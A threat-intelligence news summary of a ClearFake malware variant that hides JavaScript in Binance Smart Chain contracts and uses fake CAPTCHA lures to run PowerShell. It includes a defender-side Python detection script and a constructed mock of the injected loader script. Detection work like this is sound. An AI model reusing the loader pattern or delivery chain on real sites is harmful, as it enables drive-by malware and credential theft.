A new variant of the ClearFake malware is exploiting Web3 capabilities to enhance its malicious operations, according to a report by the Sekoia Threat Detection & Research (TDR) team. ClearFake, known for delivering malware through drive-by downloads, has evolved its tactics to include sophisticated interactions with the Binance Smart Chain.
ClearFake first emerged in July 2023, using injected code to display fake web browser download pages. By May 2024, it adopted the ClickFix tactic, deceiving users into executing malicious PowerShell code via fake error messages. The latest variant, observed since December 2024, introduces new lures such as fake reCAPTCHA or Cloudflare Turnstile verifications to trick users into executing malicious code.

This new variant incorporates additional interactions with the Binance Smart Chain. These interactions involve loading JavaScript code and resources that fingerprint the victim’s system, as well as downloading, decrypting, and displaying the ClickFix lure. “Although this new ClearFake variant continues to rely on the EtherHiding technique and the ClickFix tactic, it has introduced additional interactions with the Binance Smart Chain,” the report states.
The ClearFake framework injects JavaScript code into compromised websites, often WordPress sites. This initial script loads legitimate external dependencies and uses web3 objects to interact with the Binance Smart Chain. It retrieves and executes next-stage JavaScript code from a Binance Smart Chain contract.
ClearFake uses the web3 library to interact with the Binance Smart Chain API. The script instantiates an Ethereum-style contract object bound to a specific wallet address, with an Application Binary Interface (ABI). The ABI defines functions to retrieve JavaScript code and wallet addresses from the Binance Smart Chain.
The second stage code verifies a cookie and uses functions defined in the orchid ABI to load and execute obfuscated code from smart contracts. The teaCeremony function is used to deobfuscate and execute the loaded code.
The malicious JavaScript code is stored in the transactions of a specific wallet, and functions from the orchid ABI are used to access it. These functions include tokyoSkytree, ginzaLuxury, shibuyaCrossing, akihabaraLights, and asakusaTemple.
The reassembled JavaScript code performs several actions, including fingerprinting the victim, obtaining the external URL hosting the encrypted HTML code, downloading data from the URL, and downloading the AES key from the contract. The code then decrypts the HTML code using the AES-GCM algorithm and embeds the cleartext data in a created iframe.
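As an added, defender-side illustration (not code from the Sekoia report), the following Python triage script scans page source for the EtherHiding traits described above: web3 contract instantiation against a BSC RPC host, the orchid ABI function names, AES-GCM decryption and iframe creation. The rule weights, the BSC RPC host pattern and both sample pages are assumptions constructed for this example.

```python
import re

# Function names the report attributes to ClearFake's "orchid" ABI.
ORCHID_ABI_NAMES = ("tokyoSkytree", "ginzaLuxury", "shibuyaCrossing",
                    "akihabaraLights", "asakusaTemple", "teaCeremony")

# (rule, weight, regex). Generic EtherHiding traits score low alone, because
# legitimate dapps also instantiate web3 contracts against BSC. The RPC host
# pattern is an assumption (public BSC dataseed hosts), not from the report.
RULES = [
    ("orchid_abi", 10, re.compile("|".join(ORCHID_ABI_NAMES))),
    ("web3_contract", 2, re.compile(r"\.eth\.Contract\s*\(")),
    ("bsc_rpc", 2, re.compile(r"bsc-dataseed[\w.-]*\.binance\.org", re.I)),
    ("aes_gcm", 3, re.compile(r"['\"]AES-GCM['\"]", re.I)),
    ("iframe_inject", 3, re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I)),
]

def scan_page(html: str) -> dict:
    """Return per-rule line hits, a weighted score and a verdict for one page."""
    hits = {}
    for lineno, line in enumerate(html.splitlines(), 1):
        for name, _, rx in RULES:
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    score = sum(w for name, w, _ in RULES if name in hits)
    if "orchid_abi" in hits:
        verdict = "clearfake-orchid-abi"   # report-specific ABI names present
    elif score >= 7:
        verdict = "etherhiding-suspect"    # chain fetch + decrypt/inject traits
    else:
        verdict = "clean"
    return {"hits": hits, "score": score, "verdict": verdict}

# Constructed sample 1: injected script in a WordPress page (not a real capture).
INJECTED_PAGE = """<script src="https://cdn.example.invalid/web3.min.js"></script>
<script>
var w3 = new Web3("https://bsc-dataseed.binance.org/");
var c = new w3.eth.Contract(orchidAbi, "0xPLACEHOLDER");
c.methods.tokyoSkytree().call().then(function (b) { teaCeremony(b); });
var f = document.createElement("iframe");
crypto.subtle.decrypt({name: "AES-GCM", iv: iv}, key, payload);
</script>"""

# Constructed sample 2: a benign dapp front end talking to the same chain.
BENIGN_DAPP = """<script src="https://cdn.example.invalid/web3.min.js"></script>
<script>
var w3 = new Web3("https://bsc-dataseed.binance.org/");
var token = new w3.eth.Contract(erc20Abi, "0xPLACEHOLDER");
token.methods.balanceOf(account).call().then(render);
</script>"""
```

Running `scan_page` over both samples shows why the ABI names carry the weight: the benign dapp triggers the generic contract and RPC rules but stays below the suspect threshold.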
ClearFake uses ClickFix lures, alternating between HTML pages that display either a fake Cloudflare Turnstile or a fake reCAPTCHA. These lures are designed to trick users into executing malicious PowerShell commands.
The PowerShell commands distributed by ClearFake execute Mshta.exe with a script hosted on a remote server, often masquerading as a video file. This script is the initial stage of Emmenhtal Loader, which drops Lumma Stealer. In some cases, ClearFake has also spread Vidar Stealer.
The ClearFake variant demonstrates a persistent and evolving threat, utilizing multiple pieces of data stored in the Binance Smart Chain. This “EtherHiding” technique makes the malicious content difficult to remove and allows attackers to use a legitimate database to store malicious content. The threat remains widespread, affecting many users globally.